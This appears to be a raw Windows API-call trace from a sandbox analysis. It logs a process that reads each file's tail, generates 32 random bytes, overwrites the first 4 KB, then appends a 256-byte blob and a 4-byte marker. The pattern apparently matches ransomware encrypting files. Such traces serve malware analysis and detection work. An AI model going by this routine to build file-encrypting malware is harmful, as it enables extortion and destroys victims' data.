InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 14 [0075.258] SetFilePointerEx (in: hFile=0x79c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.258] ReadFile (in: hFile=0x79c, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0075.258] SetFilePointerEx (in: hFile=0x79c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.258] GetProcessHeap () returned 0x280000 [0075.258] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0075.258] GetProcessHeap () returned 0x280000 [0075.258] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0075.258] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0075.258] GetProcessHeap () returned 0x280000 [0075.258] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dbcb28 [0075.258] ReadFile (in: hFile=0x79c, lpBuffer=0x7dbcb28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0075.403] SetFilePointerEx (in: hFile=0x79c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.403] WriteFile (in: hFile=0x79c, lpBuffer=0x7dbcb28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0075.403] GetProcessHeap () returned 0x280000 [0075.403] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0075.403] GetProcessHeap () returned 0x280000 [0075.403] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.403] GetProcessHeap () returned 0x280000 [0075.403] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0075.403] GetProcessHeap () returned 0x280000 [0075.403] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.403] GetProcessHeap () returned 0x280000 [0075.404] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.404] GetProcessHeap () returned 0x280000 [0075.404] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.404] GetProcessHeap () returned 0x280000 [0075.405] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0075.405] GetProcessHeap () returned 0x280000 [0075.405] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0075.405] GetProcessHeap () returned 0x280000 [0075.406] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0075.406] GetProcessHeap () returned 0x280000 [0075.406] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0075.406] GetProcessHeap () returned 0x280000 [0075.406] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0075.406] GetProcessHeap () returned 0x280000 [0075.406] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0075.406] GetProcessHeap () returned 0x280000 [0075.406] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x1f8) returned 0x7dc1440 [0075.406] GetProcessHeap () returned 0x280000 [0075.406] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0075.406] GetProcessHeap () returned 0x280000 [0075.406] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.406] GetProcessHeap () returned 0x280000 [0075.406] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0075.406] GetProcessHeap () returned 0x280000 [0075.406] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.406] GetProcessHeap () returned 0x280000 [0075.406] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.406] GetProcessHeap () returned 0x280000 [0075.406] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.406] GetProcessHeap () returned 0x280000 [0075.406] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.406] GetProcessHeap () returned 0x280000 [0075.406] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.406] GetProcessHeap () returned 0x280000 [0075.406] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.406] GetProcessHeap () returned 0x280000 [0075.406] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.406] GetProcessHeap () returned 0x280000 [0075.406] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.407] GetProcessHeap () returned 0x280000 [0075.407] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.407] GetProcessHeap () returned 0x280000 [0075.407] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.407] GetProcessHeap () returned 0x280000 [0075.407] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.407] GetProcessHeap () returned 0x280000 [0075.407] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.407] GetProcessHeap () returned 0x280000 [0075.407] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.407] GetProcessHeap () returned 0x280000 [0075.407] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.407] GetProcessHeap () returned 0x280000 [0075.407] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.407] GetProcessHeap () returned 0x280000 [0075.407] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.407] GetProcessHeap () returned 0x280000 [0075.407] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.407] GetProcessHeap () returned 0x280000 [0075.407] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.407] GetProcessHeap () returned 0x280000 [0075.407] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.407] GetProcessHeap () returned 0x280000 [0075.407] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.407] GetProcessHeap () returned 0x280000 [0075.407] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.407] GetProcessHeap () returned 0x280000 [0075.407] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.407] GetProcessHeap () returned 0x280000 [0075.408] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0075.408] GetProcessHeap () returned 0x280000 [0075.408] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.408] GetProcessHeap () returned 0x280000 [0075.408] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0075.408] GetProcessHeap () returned 0x280000 [0075.408] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0075.408] GetProcessHeap () returned 0x280000 [0075.408] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0075.408] GetProcessHeap () returned 0x280000 [0075.408] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0075.408] SetFilePointerEx (in: hFile=0x79c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.408] WriteFile (in: hFile=0x79c, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0075.408] WriteFile (in: hFile=0x79c, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0075.408] GetProcessHeap () returned 0x280000 [0075.408] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dbcb28 | out: hHeap=0x280000) returned 1 [0075.408] GetProcessHeap () returned 0x280000 [0075.408] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0075.408] GetProcessHeap () returned 0x280000 [0075.408] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0075.408] CloseHandle (hObject=0x79c) returned 1 [0075.410] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 15 [0075.410] SetFilePointerEx (in: hFile=0x798, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.410] ReadFile (in: hFile=0x798, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0075.410] SetFilePointerEx (in: hFile=0x798, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.410] GetProcessHeap () returned 0x280000 [0075.410] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0075.410] GetProcessHeap () returned 0x280000 [0075.411] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0075.411] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0075.411] GetProcessHeap () returned 0x280000 [0075.411] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dbcb28 [0075.411] ReadFile (in: hFile=0x798, lpBuffer=0x7dbcb28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0075.495] SetFilePointerEx (in: hFile=0x798, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.495] WriteFile (in: hFile=0x798, lpBuffer=0x7dbcb28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0075.495] GetProcessHeap () returned 0x280000 [0075.495] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0075.495] GetProcessHeap () returned 0x280000 [0075.495] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.495] GetProcessHeap () returned 0x280000 [0075.495] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0075.495] GetProcessHeap () returned 0x280000 [0075.495] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.495] GetProcessHeap () returned 0x280000 [0075.495] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0075.495] GetProcessHeap () returned 0x280000 [0075.496] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.496] GetProcessHeap () returned 0x280000 [0075.496] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.496] GetProcessHeap () returned 0x280000 [0075.497] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0075.497] GetProcessHeap () returned 0x280000 [0075.497] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0075.497] GetProcessHeap () returned 0x280000 [0075.498] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0075.498] GetProcessHeap () returned 0x280000 [0075.498] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0075.498] GetProcessHeap () returned 0x280000 [0075.498] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0075.498] GetProcessHeap () returned 0x280000 [0075.498] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.498] GetProcessHeap () returned 0x280000 [0075.498] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0075.498] GetProcessHeap () returned 0x280000 [0075.498] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.498] GetProcessHeap () returned 0x280000 [0075.498] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.498] GetProcessHeap () returned 0x280000 [0075.498] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.498] GetProcessHeap () returned 0x280000 [0075.498] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.498] GetProcessHeap () returned 0x280000 [0075.498] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.498] GetProcessHeap () returned 0x280000 [0075.498] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.498] GetProcessHeap () returned 0x280000 [0075.498] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.498] GetProcessHeap () returned 0x280000 [0075.498] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.498] GetProcessHeap () returned 0x280000 [0075.498] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.498] GetProcessHeap () returned 0x280000 [0075.498] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.498] GetProcessHeap () returned 0x280000 [0075.499] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.499] GetProcessHeap () returned 0x280000 [0075.499] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.499] GetProcessHeap () returned 0x280000 [0075.499] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.499] GetProcessHeap () returned 0x280000 [0075.499] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.499] GetProcessHeap () returned 0x280000 [0075.499] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.499] GetProcessHeap () returned 0x280000 [0075.499] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.499] GetProcessHeap () returned 0x280000 [0075.499] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.499] GetProcessHeap () returned 0x280000 [0075.499] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 